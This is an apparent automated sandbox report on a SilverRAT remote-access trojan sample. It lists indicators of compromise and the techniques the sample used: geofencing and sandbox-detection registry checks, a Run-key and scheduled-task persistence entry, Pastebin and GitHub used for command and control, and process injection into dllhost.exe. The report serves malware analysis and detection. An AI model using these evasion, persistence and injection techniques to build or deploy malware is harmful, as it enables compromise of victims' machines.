silverrat | ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	svClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe

Executes dropped EXE 3 IoCs

pid	Process
2424	svClient.exe
1444	sv.exe
4380	svClient.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\svClient\\svClient.exe\""	svClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
3	pastebin.com
6	pastebin.com
11	pastebin.com
14	raw.githubusercontent.com
16	raw.githubusercontent.com
32	pastebin.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\svClient_Task-HOURLY-01	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\svClient.exe	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2928 set thread context of 1992	2928	powershell.EXE	106

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2496	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 63 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732328559"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CB617365-6ECA-496A-A0D7-824E15D2CACA}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 23 Nov 2024 02:22:40 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software	mousocoreworker.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager	mousocoreworker.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4428	schtasks.exe
1980	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
4524	powershell.exe
4524	powershell.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
2424	svClient.exe
4572	powershell.exe
4572	powershell.exe
2928	powershell.EXE
2928	powershell.EXE
2928	powershell.EXE
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe
Token: SeDebugPrivilege	2424	svClient.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	2928	powershell.EXE
Token: SeDebugPrivilege	2928	powershell.EXE
Token: SeDebugPrivilege	1992	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2364	svchost.exe
Token: SeIncreaseQuotaPrivilege	2364	svchost.exe
Token: SeSecurityPrivilege	2364	svchost.exe
Token: SeTakeOwnershipPrivilege	2364	svchost.exe
Token: SeLoadDriverPrivilege	2364	svchost.exe
Token: SeSystemtimePrivilege	2364	svchost.exe
Token: SeBackupPrivilege	2364	svchost.exe
Token: SeRestorePrivilege	2364	svchost.exe
Token: SeShutdownPrivilege	2364	svchost.exe
Token: SeSystemEnvironmentPrivilege	2364	svchost.exe
Token: SeUndockPrivilege	2364	svchost.exe
Token: SeManageVolumePrivilege	2364	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2364	svchost.exe
Token: SeIncreaseQuotaPrivilege	2364	svchost.exe
Token: SeSecurityPrivilege	2364	svchost.exe
Token: SeTakeOwnershipPrivilege	2364	svchost.exe
Token: SeLoadDriverPrivilege	2364	svchost.exe
Token: SeSystemtimePrivilege	2364	svchost.exe
Token: SeBackupPrivilege	2364	svchost.exe
Token: SeRestorePrivilege	2364	svchost.exe
Token: SeShutdownPrivilege	2364	svchost.exe
Token: SeSystemEnvironmentPrivilege	2364	svchost.exe
Token: SeUndockPrivilege	2364	svchost.exe
Token: SeManageVolumePrivilege	2364	svchost.exe
Token: SeAuditPrivilege	2544	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2364	svchost.exe
Token: SeIncreaseQuotaPrivilege	2364	svchost.exe
Token: SeSecurityPrivilege	2364	svchost.exe
Token: SeTakeOwnershipPrivilege	2364	svchost.exe
Token: SeLoadDriverPrivilege	2364	svchost.exe
Token: SeSystemtimePrivilege	2364	svchost.exe
Token: SeBackupPrivilege	2364	svchost.exe
Token: SeRestorePrivilege	2364	svchost.exe
Token: SeShutdownPrivilege	2364	svchost.exe
Token: SeSystemEnvironmentPrivilege	2364	svchost.exe
Token: SeUndockPrivilege	2364	svchost.exe
Token: SeManageVolumePrivilege	2364	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2364	svchost.exe
Token: SeIncreaseQuotaPrivilege	2364	svchost.exe
Token: SeSecurityPrivilege	2364	svchost.exe
Token: SeTakeOwnershipPrivilege	2364	svchost.exe
Token: SeLoadDriverPrivilege	2364	svchost.exe
Token: SeSystemtimePrivilege	2364	svchost.exe
Token: SeBackupPrivilege	2364	svchost.exe
Token: SeRestorePrivilege	2364	svchost.exe
Token: SeShutdownPrivilege	2364	svchost.exe
Token: SeSystemEnvironmentPrivilege	2364	svchost.exe
Token: SeUndockPrivilege	2364	svchost.exe
Token: SeManageVolumePrivilege	2364	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2364	svchost.exe
Token: SeIncreaseQuotaPrivilege	2364	svchost.exe
Token: SeSecurityPrivilege	2364	svchost.exe
Token: SeTakeOwnershipPrivilege	2364	svchost.exe
Token: SeLoadDriverPrivilege	2364	svchost.exe
Token: SeSystemtimePrivilege	2364	svchost.exe
Token: SeBackupPrivilege	2364	svchost.exe
Token: SeRestorePrivilege	2364	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4380	svClient.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4860 wrote to memory of 2424	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	86
PID 4860 wrote to memory of 2424	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	86
PID 4860 wrote to memory of 4524	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	87
PID 4860 wrote to memory of 4524	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	87
PID 4860 wrote to memory of 4524	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	87
PID 4860 wrote to memory of 1444	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	101
PID 4860 wrote to memory of 1444	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	101
PID 4860 wrote to memory of 1444	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	101
PID 4860 wrote to memory of 4572	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	102
PID 4860 wrote to memory of 4572	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	102
PID 4860 wrote to memory of 4572	4860	ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747.exe	102
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 2928 wrote to memory of 1992	2928	powershell.EXE	106
PID 1992 wrote to memory of 616	1992	dllhost.exe	5
PID 1992 wrote to memory of 668	1992	dllhost.exe	7
PID 1992 wrote to memory of 964	1992	dllhost.exe	12
PID 1992 wrote to memory of 384	1992	dllhost.exe	13
PID 1992 wrote to memory of 512	1992	dllhost.exe	14
PID 1992 wrote to memory of 724	1992	dllhost.exe	15
PID 1992 wrote to memory of 1052	1992	dllhost.exe	17
PID 1992 wrote to memory of 1064	1992	dllhost.exe	18
PID 1992 wrote to memory of 1080	1992	dllhost.exe	19
PID 1992 wrote to memory of 1188	1992	dllhost.exe	20
PID 1992 wrote to memory of 1236	1992	dllhost.exe	21
PID 1992 wrote to memory of 1248	1992	dllhost.exe	22
PID 1992 wrote to memory of 1332	1992	dllhost.exe	23
PID 1992 wrote to memory of 1348	1992	dllhost.exe	24
PID 1992 wrote to memory of 1404	1992	dllhost.exe	25
PID 1992 wrote to memory of 1428	1992	dllhost.exe	26
PID 1992 wrote to memory of 1528	1992	dllhost.exe	27
PID 1992 wrote to memory of 1544	1992	dllhost.exe	28
PID 1992 wrote to memory of 1604	1992	dllhost.exe	29
PID 1992 wrote to memory of 1664	1992	dllhost.exe	30
PID 1992 wrote to memory of 1720	1992	dllhost.exe	31
PID 1992 wrote to memory of 1776	1992	dllhost.exe	32
PID 1992 wrote to memory of 1884	1992	dllhost.exe	33
PID 1992 wrote to memory of 2000	1992	dllhost.exe	34
PID 1992 wrote to memory of 2032	1992	dllhost.exe	35
PID 1992 wrote to memory of 1132	1992	dllhost.exe	36
PID 1992 wrote to memory of 1716	1992	dllhost.exe	37
PID 1992 wrote to memory of 2132	1992	dllhost.exe	39
PID 1992 wrote to memory of 2152	1992	dllhost.exe	40
PID 1992 wrote to memory of 2356	1992	dllhost.exe	41
PID 1992 wrote to memory of 2364	1992	dllhost.exe	42
PID 1992 wrote to memory of 2372	1992	dllhost.exe	43
PID 1992 wrote to memory of 2480	1992	dllhost.exe	44
PID 1992 wrote to memory of 2544	1992	dllhost.exe	45
PID 1992 wrote to memory of 2564	1992	dllhost.exe	46
PID 1992 wrote to memory of 2580	1992	dllhost.exe	47
PID 1992 wrote to memory of 2588	1992	dllhost.exe	48
PID 1992 wrote to memory of 2808	1992	dllhost.exe	49
PID 1992 wrote to memory of 2864	1992	dllhost.exe	50
PID 1992 wrote to memory of 2984	1992	dllhost.exe	51
PID 1992 wrote to memory of 3068	1992	dllhost.exe	52
PID 1992 wrote to memory of 1048	1992	dllhost.exe	53
PID 1992 wrote to memory of 3332	1992	dllhost.exe	55
PID 1992 wrote to memory of 3416	1992	dllhost.exe	56
PID 1992 wrote to memory of 3564	1992	dllhost.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f96f35a3-eb65-4cdc-ae52-81085a6a48f6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1992

